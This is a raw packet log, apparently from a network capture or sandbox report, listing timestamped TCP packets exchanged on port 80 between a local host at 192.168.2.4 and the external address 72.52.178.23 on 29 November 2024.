                                                                                Nov 29, 2024 01:52:12.217291117 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.217314959 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.217379093 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.217401028 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.337172031 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337379932 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337389946 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337398052 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337461948 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.337511063 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337521076 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337527990 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337558985 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.337590933 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.337591887 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337601900 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337641954 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337646961 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.337650061 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337697029 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.337734938 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.337806940 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.457598925 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.457608938 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.457655907 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.457665920 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.457684040 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.457721949 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.501255989 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.501363039 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.621252060 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.621347904 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.665311098 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.665384054 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.785283089 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.873311996 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.873370886 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.980969906 CET804974072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:12.981024981 CET4974080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:12.981070995 CET4974080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.097635984 CET4974380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.101022959 CET804974072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.121398926 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.121474028 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.134552002 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.134620905 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.217654943 CET804974372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.217715979 CET4974380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.217861891 CET4974380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.241440058 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.254682064 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.254697084 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.254730940 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.254918098 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.254928112 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.254935980 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.254947901 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.337795019 CET804974372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.355053902 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.355174065 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.355174065 CET4974180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.475306988 CET804974172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.582693100 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.702622890 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.702713966 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.702984095 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.703012943 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.703089952 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.703111887 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.822839022 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823077917 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823086977 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823096037 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823107004 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823136091 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.823183060 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823193073 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823223114 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.823251963 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.823263884 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823275089 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823329926 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823338032 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.823339939 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823350906 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.823385954 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.823386908 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.823441029 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.943366051 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.943376064 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.943412066 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.943448067 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.943449974 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.943475962 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.943717003 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:13.985311985 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:13.985421896 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.105271101 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.105426073 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.149244070 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.149765968 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.269264936 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.357295036 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.360735893 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.403712034 CET804974372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.408327103 CET4974380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.412560940 CET4974380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.530265093 CET4974680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.532435894 CET804974372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.605310917 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.605441093 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.626871109 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.629040956 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.650166035 CET804974672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.650324106 CET4974680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.650605917 CET4974680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.725456953 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.749021053 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.749047995 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.749077082 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.749171972 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.749200106 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.749283075 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.749291897 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.770484924 CET804974672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.847515106 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:14.847574949 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.847903013 CET4974480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:14.967762947 CET804974472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.054198027 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.174455881 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.174531937 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.180883884 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.180951118 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.180977106 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.181057930 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.300820112 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.300961971 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.300971031 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.300978899 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301019907 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301033974 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301043034 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301048040 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301071882 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301090002 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301114082 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301124096 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301161051 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301187038 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301233053 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301265001 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301274061 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301291943 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.301311016 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.301337957 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.421066999 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.421080112 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.421127081 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.421137094 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.421139002 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.421191931 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.461359024 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.461450100 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.581506968 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.581612110 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.625293970 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.745286942 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.745367050 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.830022097 CET4974680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.830082893 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.851771116 CET804974672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.851829052 CET4974680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.940902948 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:15.949290037 CET804974772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:15.951335907 CET4974780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.060923100 CET804974872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.064454079 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.064665079 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.184577942 CET804974872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.411961079 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.531955004 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.532048941 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.532196999 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.532391071 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.532465935 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.532497883 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652031898 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652220011 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652409077 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652419090 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652446985 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652463913 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652507067 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652517080 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652540922 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652556896 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652595997 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652615070 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652651072 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652653933 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652694941 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652702093 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.652705908 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.652759075 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.773510933 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.773520947 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.773529053 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.773536921 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.773580074 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.773612976 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.814274073 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.814534903 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.934602022 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:16.936604023 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:16.981313944 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.101306915 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.101358891 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.249614000 CET804974872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.254440069 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.305299997 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.310430050 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.310910940 CET4974880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.430784941 CET804974872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.464154005 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.486077070 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.487029076 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.584076881 CET804975272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.584367990 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.586007118 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.607043982 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607054949 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607109070 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607135057 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607203960 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607213974 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607259989 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607270002 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.607311010 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.705897093 CET804975272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.715698004 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.715781927 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.715852022 CET4975080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:17.835704088 CET804975072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:17.939723015 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.059631109 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.059694052 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.059998989 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.060034037 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.060115099 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.060163021 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.179817915 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180088043 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180138111 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180146933 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180198908 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180202961 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180239916 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180248976 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180275917 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180392981 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180402994 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180412054 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180421114 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180454016 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180474043 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.180483103 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180494070 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.180536032 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.300096989 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.300163984 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.300185919 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.300211906 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.300236940 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.300252914 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.300337076 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.300379038 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.341248035 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.341353893 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.461299896 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.461354017 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.505235910 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.625267029 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.625319958 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.721936941 CET804975272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.722004890 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.722062111 CET4975280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.829294920 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.832431078 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.841875076 CET804975272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.848314047 CET4975580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.968282938 CET804975572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:18.968494892 CET4975580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:18.968494892 CET4975580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.013331890 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.013513088 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.088445902 CET804975572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252083063 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252111912 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252120018 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252129078 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252137899 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252146959 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252156019 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252166033 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252175093 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252182961 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.252192020 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.455785990 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.455998898 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.455998898 CET4975380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.576061010 CET804975372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.680464029 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.800432920 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.800498962 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.807667017 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.807710886 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.807790995 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.807980061 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.927762032 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.927772999 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.927779913 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.927830935 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.927900076 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.927908897 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.927946091 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.927980900 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.927989006 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.928020000 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.928028107 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.928033113 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.928077936 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.928117037 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.928126097 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.928133011 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:19.928167105 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:19.928189039 CET4975680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:20.047971010 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.047982931 CET804975672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:20.048139095 CET804975672.52.178.23192.168.2.4
